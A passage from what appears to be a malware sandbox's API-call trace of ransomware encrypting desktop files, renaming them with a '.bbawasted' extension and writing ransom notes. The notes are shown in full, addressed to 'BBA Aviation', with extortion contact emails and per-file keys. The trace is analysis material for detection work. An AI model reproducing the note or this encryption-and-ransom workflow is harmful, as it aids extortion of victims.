lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0205.774] SetEndOfFile (hFile=0x280) returned 1 [0205.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.776] CloseHandle (hObject=0x280) returned 1 [0205.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0205.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3f38 | out: hHeap=0x660000) returned 1 [0205.784] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6818) returned 1 [0205.785] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0205.785] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0205.785] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\A_8bQKRXNWK l3WAM.mp4") returned 49 [0205.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6adb18 [0205.785] lstrcpyW (in: lpString1=0x6adb7a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0205.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.785] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6b48) returned 1 [0205.786] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0205.786] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0205.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\A_8bQKRXNWK l3WAM.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\a_8bqkrxnwk l3wam.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0205.920] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0205.921] SetEndOfFile (hFile=0x27c) returned 1 [0205.921] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.921] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0205.921] lstrcpyW (in: lpString1=0x6adb7a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0205.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\A_8bQKRXNWK l3WAM.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\a_8bqkrxnwk l3wam.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\A_8bQKRXNWK l3WAM.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\a_8bqkrxnwk l3wam.mp4.bbawasted")) returned 1 [0205.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\A_8bQKRXNWK l3WAM.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\a_8bqkrxnwk l3wam.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0205.982] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0205.982] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x5899 [0205.982] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5899) returned 0x640000 [0205.983] CloseHandle (hObject=0x280) returned 1 [0205.989] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0205.989] CloseHandle (hObject=0x294) returned 1 [0205.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0205.989] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a61b8) returned 1 [0205.990] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0205.990] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0205.990] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0205.990] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0205.990] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0205.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0205.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0205.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0205.999] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]hoLr6ra4KYDiYpPFgI4TH7JkfOji1jRmItN1BXr4EMrndGYWkPNa/ISCLuLkJraF\r\nRsQj52jslqCRjZXJRZglgm1fke3QUOgaslLvy2zpFKK2GP7UHqjx9l53xsow9g6H\r\nYaThF610i8MzAGTxYAdb8MO/KxoTr9nSqv/WQDF6O/2TLyvB29nusqZG4JrETtaI\r\niHL0LAsJHTFkQ7GKbAzN6OOKjSzZAy9lWdJMV+Uy5jN5HdjFWsmjVuLSCXnT0T/f\r\neNPCS6xF2kme4UutOJhaPswnWPoNpO0DcWGFesnn1epIfAkT5wg272cN/ZR0InYD\r\n4XuLennKB/L6Xlk0dqCM72f6WT222DOKFb9DG2NcIy3C736+57lfwMNAlcAcwvu4\r\nJIMRiIhACd8cnDugkaiHsEAMSulwkOQV3d98Kz7aslHGpD0BLjG8XUOIO0E0nevz\r\nxXBT0ZeZH/6PBLk/aiOvr8oivOqrBPTPijzD7ZDtZZutuRHvib48s1uWIGS8Spjk\r\nmnrcMLncLplEn30VZoiv6CAssMc/A4b+eS6wlzMeIM4BDS560WUrrAueLjm1IOdC\r\nL26n92l6wBwdMWnvO2Wr5waHQcZvtlJZJhl+c343fhLiVgoKkYuTse9rY4CNMFph\r\nRZxBB1qaA3Yt59ljpkELHp9V4n6V5WjJRybzmPbJgJH=[end_key]\r\nKEEP IT\r\n") returned 984 [0205.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0205.999] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0205.999] SetEndOfFile (hFile=0x27c) returned 1 [0206.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0206.002] CloseHandle (hObject=0x27c) returned 1 [0206.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0206.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2138 | out: hHeap=0x660000) returned 1 [0206.368] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0206.369] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0206.369] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0206.369] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ewg8tWd2.ods") returned 40 [0206.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0206.369] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0206.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0206.369] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6c58) returned 1 [0206.370] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0206.370] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0206.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ewg8tWd2.ods.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\ewg8twd2.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0206.759] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0206.761] SetEndOfFile (hFile=0x27c) returned 1 [0206.762] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.762] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0206.762] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0206.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ewg8tWd2.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\ewg8twd2.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ewg8tWd2.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ewg8twd2.ods.bbawasted")) returned 1 [0206.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Ewg8tWd2.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ewg8twd2.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0206.764] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0206.765] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xb48a [0206.765] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb48a) returned 0x640000 [0206.765] CloseHandle (hObject=0x280) returned 1 [0206.770] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0206.771] CloseHandle (hObject=0x290) returned 1 [0206.771] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0206.771] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a60a8) returned 1 [0206.772] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0206.772] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0206.772] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a61b8) returned 1 [0206.773] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0206.773] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0206.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0206.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0206.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0206.784] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QAcP/Dzzj+P6gfObRK0v1ojmGR2A9egGRGrf5Ie7GYDHytCK5ey43/QZe4toD4Ex\r\nD9DZ8+0V0enoEcFvKvAVLKaiIBcgBamyvy8bshW2RcOQ9y76tkH5TCXklO9BU5ct\r\ngCl+YuTNyu58KtXVvoX/6m1yhNpskchCkY1qia5q5by8ELUQrZvQON0olxOhIHH7\r\n3Mh/ENKbM/Asqhjn5PK4Kxj72mbVqgYqgfPgx3mzqXjatm+iDIjtJUKBASyOOfwC\r\nVev/aMDPMOt5V0oI87UVRVjYrDstA420RziKZwitfiYf/FMDkj8VNh6S1n/OUu8v\r\n32DeZN05O0LphP9Rzs6JxBoI/qUKH6wsVUdzlsoLwpAYcxLl8ERZd0v/MvaHbkcm\r\nweOSkb/Sqm/gvAHmDfPbr8AbbXwpZX/Xn3OSl1IGbryA0cazNtU3SUERX4TOISOk\r\nIBJ/2t1xmL4ypqGRlOLKGhNbMmUM6t3AEl2mnwBhkhIwzIp6OlN6lp2VFgUXwLRM\r\nQRj9Abxk4f7OBYit/TuABelSZdwFPbYtks2tJFd/DY6Q3igDPCgTbRNjUdMrcr/O\r\n1MjE6ZzMBHZpc7vP6S89PrGhwa50fPtQQ93aC2Ib2bYZAYQOJDptobPNTaDk1pQd\r\nXyzZgPwcHlq2JKa/PadwCgGntsaY+sC9SrwkEsyQuym=[end_key]\r\nKEEP IT\r\n") returned 984 [0206.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0206.784] WriteFile (in: hFile=0x27c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0206.784] SetEndOfFile (hFile=0x27c) returned 1 [0206.787] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0206.787] CloseHandle (hObject=0x27c) returned 1 [0206.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0206.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4da8 | out: hHeap=0x660000) returned 1 [0206.789] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6020) returned 1 [0206.790] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0206.790] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0206.790] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fm3Aq.flv") returned 37 [0206.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x254) returned 0x6adb18 [0206.790] lstrcpyW (in: lpString1=0x6adb62, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0206.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0206.790] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6680) returned 1 [0206.791] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0206.791] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0206.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fm3Aq.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\fm3aq.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0207.355] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0207.356] SetEndOfFile (hFile=0x294) returned 1 [0207.357] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0207.357] lstrcpyW (in: lpString1=0x6adb62, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0207.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fm3Aq.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\fm3aq.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fm3Aq.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\fm3aq.flv.bbawasted")) returned 1 [0207.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fm3Aq.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\fm3aq.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0207.358] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0207.359] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x759d [0207.359] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x759d) returned 0x640000 [0207.359] CloseHandle (hObject=0x27c) returned 1 [0207.365] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0207.365] CloseHandle (hObject=0x290) returned 1 [0207.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0207.366] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0207.367] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0207.367] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0207.367] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0207.367] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0207.367] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0207.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0207.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0207.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0207.379] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GhPEEl1NVGCGALN5d6QsWWTfWrSDyv++tltM8izaKo6xd23IACg/Gbt8JT1Fbu7O\r\nzS4uBtJ9FlOpDZKnrO7+cRG68bqxfkPFrQvXv94UvgJLlqk66goHnkjk0RKdrqKu\r\n6ElEZ6O8bJXS+qKdrcbQ+Sa/3qSP8wcBGck8vIMlLqEXKLwJPQshIXvmkM8K+Q6w\r\n4pcVIdm9THXl4CwiJCYgwjQlyJn97ISGXpgfWvFBgXzuEGI5D5r9Clx6R75LgUgo\r\nNKkcHOeQuZQ5q7qLDpcZJlfTvQOKEI4LG33WVawYIu0PnhuBy0rKbXPRFNBDPQp4\r\nufBVxwA7+n9jwOU7FRZxFBbntSVwX+Ta9rh6KQWS3BqfJxueTzsrpsUMRC8Qi4r9\r\n6j/oljMspqHX/CCNZkOViKsKydaL3TWeode7/pbCjoirXPeNz6copHjJpRTO4YG/\r\nZAO7qg0BUi4PMIcF35UkqUMOzXzVqf5GmTLUsoOZpV3kSf5ey6XMuhvPZnSf6Iat\r\neRB88Y5ljBZj0wYdJIshV+UA7qMOS08GsbQbThJOBbrLPk+BsYYZHq0jjzH09wNs\r\nQnifb4zET6Lc9HrE6oLVMtpfNVj1K5h/D15HRNlNfsOpB7MtqBrd9rDCS0m9X/mh\r\nrQ29lETnGR6Qfex2pH3Ut6JcCEi1zPAvPpAOuIxGP/9=[end_key]\r\nKEEP IT\r\n") returned 984 [0207.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0207.380] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0207.380] SetEndOfFile (hFile=0x294) returned 1 [0207.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0207.383] CloseHandle (hObject=0x294) returned 1 [0207.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0207.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3308 | out: hHeap=0x660000) returned 1 [0207.389] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6350) returned 1 [0207.390] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0207.390] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0207.390] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Gsep Gy9g8U9SV5WI.jpg") returned 49 [0207.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6adb18 [0207.390] lstrcpyW (in: lpString1=0x6adb7a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0207.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0207.390] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0207.391] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0207.391] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0207.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Gsep Gy9g8U9SV5WI.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\gsep gy9g8u9sv5wi.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0207.440] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0207.441] SetEndOfFile (hFile=0x290) returned 1 [0207.442] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 